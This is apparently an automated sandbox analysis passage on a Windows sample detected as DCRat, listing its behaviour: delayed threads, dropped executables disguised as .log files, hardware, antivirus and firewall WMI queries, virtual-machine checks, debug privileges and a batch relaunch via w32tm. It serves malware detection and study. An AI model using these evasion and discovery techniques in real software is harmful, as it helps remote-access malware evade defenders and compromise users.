                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598437Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598326Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598214Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598093Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597984Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597872Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597750Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597640Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597530Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597406Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597297Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597181Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597078Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596968Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596859Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596750Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596640Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596531Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596421Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596277Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596171Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596062Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595950Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595803Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595687Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595570Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595359Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595150Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595046Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594934Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594828Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594718Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594609Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594500Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594390Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594281Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWindow / User API: threadDelayed 1848Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWindow / User API: threadDelayed 7940Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\jafJbNin.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\JBWWRkkK.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\rhLyTfpq.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\saGrZLhX.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\vUJHQLLN.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\INSOfWoM.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\pekirssD.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\aauTzsJb.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\trhzTxUr.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\qhrIoOvZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\mrAShSvf.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZAjtbXwC.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\OmvnkQVc.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\wINPCZGL.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\lcSrxwmi.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\HwrGmkBt.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\WagdIJql.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\imbBpzmp.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\pfYQxwkv.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\aInBkXPZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\mutAqiZC.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\yVbyLHQi.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\ItSOHkQo.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\BDOgJEwE.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\taahEcao.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\krGRUzVH.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\ftMSEDAr.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\EOEXonVW.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\NjdutxKy.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\JtmEmBJF.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\ctybNUhB.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\xiXqauUk.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\gJztsmvT.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\UhRuWMEn.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\FInxAXGv.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\zTDGhHfd.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\NsNNYhlE.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\fBwkimbw.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\sSWZvcGR.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\YDIlGXhH.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\NpUfPQGh.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\CBqofELz.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\SLfLdrcT.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDropped PE file which has not been started: C:\Users\user\Desktop\XXHldJFg.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7960Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599890s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599781s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599672s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599562s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599453s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599343s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599234s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599125s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -599015s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598902s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598781s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598671s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598562s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7396Thread sleep time: -10800000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598437s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598326s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598214s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -598093s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597984s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597872s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597750s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597640s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597530s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597406s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597297s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597181s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597078s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596968s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596859s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596750s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596640s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596531s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596421s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596277s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596171s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596062s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595950s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595803s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595687s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595570s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595359s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595150s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595046s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594934s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594828s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594718s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594609s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594500s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594390s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594281s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599890Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599781Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599672Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599562Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599453Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599343Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599234Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599125Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599015Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598902Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598781Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598671Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598562Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598437Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598326Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598214Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598093Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597984Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597872Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597750Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597640Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597530Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597406Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597297Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597181Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 597078Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596968Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596859Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596750Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596640Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596531Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596421Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596277Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596171Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 596062Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595950Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595803Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595687Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595570Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595359Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595150Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 595046Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594934Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594828Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594718Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594609Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594500Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594390Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 594281Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002F11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]
                              Source: 150bIjWiGH.exe, 00000000.00000002.1747363747.000000001C717000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: w32tm.exe, 00000004.00000002.1771968900.00000261EAFA7000.00000004.00000020.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2944374475.000000001B570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\150bIjWiGH.exe "C:\Users\user\Desktop\150bIjWiGH.exe" Jump to behavior
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeQueries volume information: C:\Users\user\Desktop\150bIjWiGH.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeQueries volume information: C:\Users\user\Desktop\150bIjWiGH.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
